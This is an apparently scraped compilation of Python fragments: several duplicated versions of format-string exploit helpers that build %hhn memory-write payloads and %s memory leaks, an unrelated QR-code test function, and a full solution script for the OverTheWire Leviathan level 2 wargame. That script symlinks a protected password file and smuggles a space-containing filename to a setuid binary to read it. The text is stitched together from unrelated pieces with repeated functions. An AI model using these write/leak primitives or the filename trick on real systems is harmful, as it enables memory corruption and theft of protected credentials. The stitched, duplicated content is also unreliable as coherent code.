def qrcode_check(self): txt = randoms(random.randint(10, 40)) log.info('qrencode %s', txt) qr = self.translate('qrencode', txt) encoding = random.choice(['b64', 'hex']) log.info('qrdecode (%s)', encoding) txt_ = self.translate('qrdecode', _encode(qr, encoding), encoding) if txt != txt_: self.check_fail('%s not matched %s' % (txt, txt_)) return False return True
def execute_writes(self): """execute_writes() -> None Makes payload and send it to the vulnerable process Returns: None """ fmtstr = randoms(self.padlen, string.ascii_letters.encode("utf8")) fmtstr += fmtstr_payload(self.offset, self.writes, numbwritten=self.padlen, write_size="byte") self.execute_fmt(fmtstr) self.writes = {}
def execute_writes(self): """execute_writes() -> None Makes payload and send it to the vulnerable process Returns: None """ fmtstr = randoms(self.padlen) fmtstr += fmtstr_payload(self.offset, self.writes, numbwritten=self.padlen, write_size='byte') self.execute_fmt(fmtstr) self.writes = {}
def execute_writes(self): """execute_writes() -> None Makes payload and send it to the vulnerable process Returns: None """ fmtstr = randoms(self.padlen).encode() fmtstr += fmtstr_payload(self.offset, self.writes, numbwritten=self.padlen + self.numbwritten, write_size='byte') self.execute_fmt(fmtstr) self.writes = {}
def _leaker(self, addr): # Hack: elfheaders often start at offset 0 in a page, # but we often can't leak addresses containing null bytes, # and the page below elfheaders is often not mapped. # Thus the solution to this problem is to check if the next 3 bytes are # "ELF" and if so we lie and leak "\x7f" # unless it is leaked otherwise. if addr & 0xfff == 0 and self.leaker._leak(addr+1, 3, False) == "ELF": return "\x7f" fmtstr = randoms(self.padlen) + pack(addr) + "START%%%d$sEND" % self.offset leak = self.execute_fmt(fmtstr) leak = re.findall(r"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0] leak += "\x00" return leak
def _leaker(self, addr): # Hack: elfheaders often start at offset 0 in a page, # but we often can't leak addresses containing null bytes, # and the page below elfheaders is often not mapped. # Thus the solution to this problem is to check if the next 3 bytes are # "ELF" and if so we lie and leak "\x7f" # unless it is leaked otherwise. if addr & 0xfff == 0 and self.leaker._leak(addr+1, 3, False) == b"ELF": return b"\x7f" fmtstr = randoms(self.padlen).encode() + pack(addr) + b"START%%%d$sEND" % self.offset leak = self.execute_fmt(fmtstr) leak = re.findall(br"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0] leak += b"\x00" return leak
def _leaker(self, addr): # Hack: elfheaders often start at offset 0 in a page, # but we often can't leak addresses containing null bytes, # and the page below elfheaders is often not mapped. # Thus the solution to this problem is to check if the next 3 bytes are # "ELF" and if so we lie and leak "\x7f" # unless it is leaked otherwise. if addr & 0xFFF == 0 and self.leaker._leak(addr + 1, 3, False) == b"ELF": return b"\x7f" fmtstr = randoms(self.padlen, string.ascii_letters.encode("utf8")) fmtstr += pack(addr) fmtstr += "START%{}$sEND".format(self.offset).encode("utf8") leak = self.execute_fmt(fmtstr) leak = re.findall(b"START(.*)END", leak, re.MULTILINE | re.DOTALL)[0] leak += b"\x00" return leak
def execute_writes(self): addrs = [] bytes = [] #convert every write into single-byte writes for addr, data in self.writes: data = flat(data) for off, b in enumerate(data): addrs.append(addr + off) bytes.append(u8(b)) fmtstr = randoms(self.padlen) + flat(addrs) n = self.numbwritten + len(fmtstr) for i, b in enumerate(bytes): b -= (n % 256) if b <= 0: b += 256 fmtstr += "%%%dc%%%d$hhn" % (b, self.offset + i) n += b self.execute_fmt(fmtstr) self.writes = []
def execute_writes(self): addrs = [] bytes = [] #convert every write into single-byte writes for addr, data in self.writes: data = flat(data) for off, b in enumerate(data): addrs.append(addr+off) bytes.append(u8(b)) fmtstr = randoms(self.padlen) + flat(addrs) n = self.numbwritten + len(fmtstr) for i, b in enumerate(bytes): b -= (n % 256) if b <= 0: b += 256 fmtstr += "%%%dc%%%d$hhn" % (b, self.offset + i) n += b self.execute_fmt(fmtstr) self.writes = []
from pwn import * from pygments import highlight from pygments.lexers import CLexer from pygments.formatters import TerminalFormatter from pwnlib.util.fiddling import randoms from time import sleep level = 2 user = '******' % level host = 'leviathan.labs.overthewire.org' password = '******' port = 2223 def connectToLevel(): return ssh(user=user, host=host, port=port, password=password) context(arch='i386', os='linux') # Base folder for unpack UNPACK_FOLDER = '/tmp/%s' % randoms(10) sh = connectToLevel() sh = sh.process('/bin/sh', env={'PS1': ''}) sh.sendline('mkdir -p %s' % UNPACK_FOLDER) sh.sendline('cd %s' % UNPACK_FOLDER) sh.sendline('ln -s /etc/leviathan_pass/leviathan3 leviathan3') sh.sendline('touch "tmp leviathan3"') sh.sendline('/home/leviathan2/printfile "tmp leviathan3" 2>/dev/null') log.info('Flag = %s' % sh.recvline())